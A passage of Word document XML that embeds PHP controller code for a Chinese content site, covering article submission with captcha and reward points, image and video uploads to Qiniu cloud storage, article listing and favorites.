      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466A1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6E824C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oney']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ADB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ext'] = $v['text'] . ' &lt;b id="data1"&gt;' . $v['data'] . '&lt;/b&gt;&lt;b id="data2"&gt;' . $v['money'] . '&lt;/b&gt; ' . $type[$v['type']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA748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A56C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date'] = date('Y-m-d H:i:s', $v['time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4765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114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0DF67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7DB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Add()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A052B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355C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Id = input('id/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFD68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config')-&gt;where("name='articleAdd' or name='articleHide' or name='articleScore' or name='articleNum' or name='articleCode' or name='articleJingyan' or name='articleMoney'")-&gt;fetchSql(false)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539EFA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Add = $data['0']['text'];     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15038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Hide = $data['1']['text'];    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A71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core = $data['2']['text'];   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2D4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Num = $data['3']['text'];     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2ABA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Code = $data['4']['text'];    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643663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Jingyan = $data['5']['text'];   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159B28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Money = $data['6']['text'];   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5AC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40FB5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Add == '-1') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0674F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184C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投稿已关闭</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5FAD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0A83A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0E8E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865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Hide == '-1') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7933DA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hide'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554D4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0229E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2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B37A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906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5C8A87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 input('param.title', '', 'strip_tags') ? input('param.title', '', 'strip_tags') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4980BA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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A71F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 = $title;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C97B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8436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 input('param.mychannel/d') ? input('param.mychannel/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3718F9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1 || $mychannel == 2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54216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input('param.images') ? input('param.images') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203822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ages) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2499E9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s'] = $images;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F936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json_decode(htmlspecialchars_decode($images), true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146A69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mg) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515977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 = $img[0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703C96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59A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59B6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mychannel == 3 || $mychannel == 4) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B131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ychannel == 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C4F8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itle) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59803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810B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标题不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2381B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1FA5B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932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28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154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 input('param.video') ? input('param.video') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01457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url = input('param.videourl') ? input('param.videourl') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6151DE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qiniu_video'] = $video;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE09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qiniu_video_type'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6868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qiniu_video'] = $video;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36833B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video'] = $videourl;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638831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ADEE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4C37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0C0E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 input('param.description', '', 'strip_tags') ? input('param.description', '', 'strip_tags') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9C31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escription) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191B6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escription'] = $description;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFBC1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3FB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mychannel;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB419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54559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24E03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max:80',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F815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scription' =&gt; 'max:250',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096CE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require|number|in:1,2,3,4',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327C6B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2D12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E1C8B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title,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0818B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escription' =&gt; $description,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EE6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mychannel,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C6B4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0DAE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43E7AA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977C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7351D0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24BE4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BF24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DAF3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Code == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB05E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zm = input('param.yzm/d') ? input('param.yzm/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C22E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yzm) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628B9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aptcha_check($yzm)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB60F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268D3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验证码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124305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303,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3035AA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D71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3919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189C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5EC46E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请输入验证码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E147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D87A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BE32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A982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0F18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Id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533E18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pdate_time'] = $time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104BF1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es'] = 50;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C715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lags'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331C84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lick'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68176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 = $time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ED6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01A095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 $mychannel == 4 ? 0 : 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0881B1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Db::name('article')-&gt;insertGetId($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728F5F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where['hide'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01615F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Money) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8D6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money',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data' =&gt; '+'])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E70D2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09420D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articleMoney, 'money', '+');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FB08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Inc('money', $articleMoney);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A70EF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A4E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CE93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Score) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110822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score',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data' =&gt; '+'])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001497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30F2D0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articleScore, 'score', '+');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E392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Inc('score', </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>$articleScore);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2127C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5454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326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Jingyan) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649DDB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itlcejiance = Db::name('member_records')-&gt;where(['type' =&gt; 'jingyan', 'text' =&gt;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data' =&gt; '+'])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F7A7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itlcejiance) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ED87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奖励</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articleJingyan, 'jingyan', '+');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7470D7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Inc('jingyan', $articleJingyan);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2814D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77C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1454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 '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>自动审核通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F01C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发布成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5221F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D22A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id . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>等待审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347A1F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发布成功，等待审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1B3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285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55DA6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gt;where(['id' =&gt; $aritlceId, 'uid' =&gt; $this-&gt;memberId])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B8C9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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50120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5F20BA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修改</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AD29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3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1CA6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1E09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DC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 $article)-&gt;update($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0317B0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EE72F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460F3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CF1A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where['hide'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112E23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ticle . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改成功，自动审核通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321A6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9B2FE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22D22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147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08D53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投稿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rticle . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改成功，等待审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C31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4FECEC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等待审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3EE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B06C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3CC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F5D7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A6AC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A791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magesUpload()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D88D5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7077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569EF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2B441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6DAA9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44DD7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7EF25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3334A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3B4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1924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24939B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eshi = ['jpg', 'png', 'gif', 'jpeg', 'JPEG', 'JPG', 'GIF', 'PNG'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD000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_array($ext, $geshi)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA188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3114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图片格式不对，请换张图片吧</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392C23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D6861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7F95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9C37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substr(md5($file-&gt;getRealPath()), 0, 5) . date('YmdHis') . rand(100, 999999) . '.jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511586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41C43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1F1671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3B051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DD642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2FB72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217206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2E5FEF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31711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59B35A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50A877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9EC2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err,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2299C6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06379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28A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9255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9527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ret['key'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C926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4ADC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FAAC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DB621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image');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F30ED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fo = $file-&gt;validate(['size' =&gt; 105678, 'ext' =&gt; 'jpg,png,gif,jpeg'])-&gt;move(ROOT_PATH . 'public' . DS . 'uploads' . DS . 'weitoutiao' . DS . 'images');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6315B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fo) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C6D4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public/uploads/weitoutiao/images/' . $info-&gt;getSaveName();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCD32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str_replace('\\', '/', $img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141DD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6CAB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img,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3F5C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C8C7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09057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7DD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file-&gt;getError(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A58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027C0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002F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708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088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videoUpload()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293DE2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623B8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63599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7F7F71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574261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28A03B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260F2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2EF90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peline = $db['4']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C954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db['5']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C604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679726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key = \Qiniu\base64_urlSafeEncode($bucket);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9C39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fops . '|saveas/' . $savekey;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00648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enurl = config()['appConfig']['url'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B509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licy = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E69CF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Ops' =&gt; $fops,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4A0F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Pipeline' =&gt; $pipeline,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50335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NotifyUrl' =&gt; $wenurl . '/index.php/api/index/notify',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8D5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D084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token = $auth-&gt;uploadToken($bucket, null, 3600, $policy);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7E6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video');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121C95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6DA9A8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20B65B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uptoken, null, $filePath);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF0E1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4A0A75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E46E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失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515923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63A604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FFF1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FD58C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E77C8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p>
    <w:p w14:paraId="744807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Id' =&gt; $ret['persistentId'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4BCB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gt; $ret['key'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CA6A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5647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F4BB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BE5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CDE7E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video');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAF44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24F46F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wtt' . substr(md5($file-&gt;getRealPath()), 0, 5) . date('YmdHis') . rand(100, 999999) . "." . $ext;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506FD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6D2591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5543BD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22B81D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0C5FBE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501436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32897A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peline = 'abc';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F20E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avthumb/mp4/s/640x360/vb/1.25m";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF8C2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avekey = \Qiniu\base64_urlSafeEncode($key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E554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ps = $fops . '|saveas/' . $savekey;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B4F2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olicy = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBBF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Ops' =&gt; $fops,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA0B7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ersistentPipeline' =&gt; $pipeline,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B66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025B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token = $auth-&gt;uploadToken($bucket, $key, 3600, $policy);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788EB4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15C18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3D8B2A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EEF74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6341F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43E4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3CF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3B6E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270B8E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uptoken, $key, $filePath);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015849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32FEF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dump($err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6734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14A0D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r_dump($ret);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FDC3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526B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EE3EF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 = request()-&gt;file('video');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29625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Path = $file-&gt;getRealPath();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7A46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lePath) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FE5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6462C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非法操作</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D27E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3E49F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358F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C32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 = pathinfo($file-&gt;getInfo('name'), PATHINFO_EXTENSION);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1F30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wtt' . substr(md5($file-&gt;getRealPath()), 0, 5) . date('YmdHis') . rand(100, 999999) . "." . $ext;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709CB2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4675C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config')-&gt;where(['type' =&gt; 'sdkQiniu'])-&gt;cache(_cache('db'))-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5AB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9C85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44C13A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43E400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1CE81C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b['3']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FABD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auth-&gt;uploadToken($bucket);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3B70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ploadMgr = new UploadManager();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5963DB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uploadMgr-&gt;putFile($token, $key, $filePath);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F59F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77FE37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EA9F6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err,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09676D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FD37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54C8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29517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CB368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ret['key'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79ABE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41ED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3959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file_put_contents("video.txt", var_export($ret, true));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2946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video2.txt", var_export($err, true));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C79D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7A8B4B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nfo) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEDCE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public/uploads/weitoutiao/video/' . $info-&gt;getSaveName();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A11E5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 = str_replace('\\', '/', $img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA9CF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8B30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img,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D66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9E7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le_put_contents("video.txt", var_export($img, true));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C317E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1BD70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B7F4B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file-&gt;getError(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8440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5A52A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6D11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3AC8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23BA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List()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC98D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5757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 input('param.money') ? input('param.money') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C1DA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aram.type') ? input('param.type') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11ECE0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input('param.data') ? input('param.data') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476A87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 ? input('param.pages') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD71B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 = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43402F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ney) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106FB2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ney == '-1') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282E9D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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F54C5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234F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 = $money;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15548D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D487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669B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7E55E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 = $type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF690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9A4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1A06D7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ata'] = $data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139496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6621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57148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gt;where($where)-&gt;order('des desc,id desc')-&gt;field('id,title,typeid,style,flags,des,tags,image,click,keywords,description,create_time,update_time,content,hide,source,writer')-&gt;paginate($pages)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D8BF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ide = [0 =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>隐藏</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>', 1 =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>', 2 =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>', 3 =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2F17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8B019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reate_time'] = date('Y-m-d H:i:s', $v['create_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C8F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pdate_time'] = date('Y-m-d H:i:s', $v['update_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3682C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hides'] = $hide[$v['hide']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A8F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1BA8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15095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CC9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rticleView()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDBA8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D8D1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d = input('param.id/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF6C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4BE5E0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D1F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2F03D8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41A022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5AA0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D555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gt;where(['id' =&gt; $id, 'uid' =&gt; $this-&gt;memberId])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554BEC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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA9D1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DEE3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文章不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C86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01F07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7154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B543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article]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DE96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421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voriteAdd()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324400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C6A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 ? input('param.aid/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6068E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2BD1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1A2D5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4F0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47189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14F19A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B8D2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47A60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5D20A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75E67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254AA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AE0B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F65B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u = Db::name('member_favorite')-&gt;where(['uid' =&gt; $this-&gt;memberId, 'aid' =&gt; $aid, 'type' =&gt; 0])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C13D0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hou) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3BE0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7166E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收藏过了，在会员中心查看我的收藏</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42995B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104D5A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A1F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A221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35FA7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65376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1AB2F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favorite')-&gt;insert($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB25A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B4221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收藏</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id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330C9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5DB87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已收藏</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
